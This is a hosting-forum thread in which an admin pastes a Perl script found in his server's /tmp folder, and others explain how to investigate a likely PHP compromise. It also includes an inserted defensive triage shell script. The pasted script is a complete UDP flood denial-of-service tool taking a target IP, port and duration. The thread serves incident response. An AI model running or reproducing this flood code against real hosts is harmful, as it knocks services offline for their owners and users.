Script in tmp made by Hacker

jeroman8

Well-Known Member
Mar 14, 2003
I had a script made by a hacking team called UMHCreW in my TMP folder.
Anyone know what it is?

Is it ok to remove/delete ALL files in the tmp folder, or will this
screw something up?
I have old files and a lot of folders and crazy files in there.

Here's the script...


#!/usr/bin/perl
#####################################################
# Simple but agressive udp flood.
#
# gr33ts: Amaz1ng^ RUBIN1,Caffeine,cyberboki, etc.
#
# lemurian from UMHCreW @ eu.undernet.org #deadworld
######################################################

use Socket;

[email protected];

if ($ARGC !=3) {
printf "UMHCreW 2004\n";
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "Simpe but Agressive udp flood - [email protected]\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
chirpy

Well-Known Member
Verified Vendor
Jun 15, 2002
Go on, have a guess
Well, that's just the symptoms of a problem. What is the ownership of that file? If it's nobody:nobody, then you have a vulnerable PHP script on your server and you need to track it down and either fix or remove it. If it's owned by a user, you can then suspend their account while you investigate further. You should also make sure that the script is not actually running on your server (i.e. look for it having open ports) and then definitely move it somewhere safe. Simply deleting it first before investigating further is not necessarily the best thing to do. Moving it, or tar'ing it up and preserving the ownership, should be first.
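The triage order described in the reply above (check the owner, make sure nothing is still running the file, then archive it with ownership preserved instead of just deleting it), as an added shell example that is not code from this thread. It assumes Linux with a readable /proc and GNU-style stat/tar; the quarantine directory is a placeholder to adjust.

```shell
#!/bin/sh
# Triage helper for a suspicious file found in /tmp. Added example, not the
# poster's code. Assumes Linux with GNU stat/tar and a readable /proc.
# Order follows the advice above: record the owner, check whether anything is
# still running it, then move it aside with ownership preserved, not rm it.

QUARANTINE=${QUARANTINE:-/root/quarantine}   # assumed location, adjust

# Owner and group of the file, e.g. "nobody:nobody".
file_owner() {
    stat -c '%U:%G' "$1"
}

# Print PIDs whose executable or command line refers to the file; return 0
# if any were found. Run as root to see every user's processes.
running_pids() {
    resolved=$(readlink -f "$1")
    found=1
    for p in /proc/[0-9]*; do
        if [ "$(readlink "$p/exe" 2>/dev/null)" = "$resolved" ] ||
           tr '\0' ' ' < "$p/cmdline" 2>/dev/null | grep -qF -- "$1"; then
            echo "${p#/proc/}"
            found=0
        fi
    done
    return $found
}

# Archive the file (tar records owner, group and mode) and only then remove it.
quarantine_file() {
    mkdir -p "$QUARANTINE"
    archive="$QUARANTINE/$(basename "$1")-$(date +%Y%m%d%H%M%S).tar"
    tar -cf "$archive" -C "$(dirname "$1")" "$(basename "$1")" && rm -f -- "$1"
    echo "$archive"
}

# Full triage of one file: classify by owner, report running copies, quarantine.
triage() {
    owner=$(file_owner "$1")
    case $owner in
        nobody:*) echo "$1 owned by $owner: suspect an exploited PHP script" ;;
        *)        echo "$1 owned by $owner: consider suspending ${owner%%:*}" ;;
    esac
    if pids=$(running_pids "$1"); then
        echo "still running as PID(s): $(echo $pids | tr '\n' ' ')"
    fi
    quarantine_file "$1"
}
```

Run it as `triage /tmp/suspicious-file`; the archive keeps the original owner so the account or web-server user it points at is still visible later.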
jeroman8

Well-Known Member
Mar 14, 2003
Yes, it's nobody that owns the file.

How can I track which PHP script does this?
Just some basic stuff so I can go from there would be nice :)
GOT

Get Proactive!
PartnerNOC
Apr 8, 2003
Chesapeake, VA
Short of running PHP as suexec you'll really not be able to track it down, save for searching every PHP file, and even that may not turn it up.

You cannot prevent PHP from writing to the /tmp directory, so what you need to do is make it so that people cannot execute programs from there. Remove access to compilers. Security for your server needs to be taken very seriously (not saying that you are not), and you should either spend some time reading up on how to secure your Linux server, or contract it to one of the several reputable server admins hanging around.
jeroman8

Well-Known Member
Mar 14, 2003
Thank you!

Is it ok to delete all old tmp files?
They are just there, right, leftovers...